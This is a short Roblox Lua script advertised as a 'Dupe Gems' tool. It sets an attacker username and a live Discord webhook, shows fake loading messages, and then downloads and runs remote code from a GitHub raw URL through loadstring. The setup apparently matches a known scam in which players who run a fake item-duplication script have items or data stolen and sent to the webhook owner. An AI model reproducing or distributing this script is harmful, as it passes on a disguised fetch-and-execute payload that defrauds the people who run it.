Username = "Rido_ganteng839"

WebHook = "https://discord.com/api/webhooks/1073866117610733618/7w8OYFfRBCQPwIapADX1wPtybe0JgsiThByIng8zEDa7FbalfTAnJm6l7aonqzcAu83d"

_G.CustomScriptName = "Dupe Gems"

_G.Text1 = "Script Loaded..."

_G.Text2 = "Waiting for Script"

_G.Text3 = "Checking Scripts..."

_G.Text4 = "Starting Scripts..."

loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
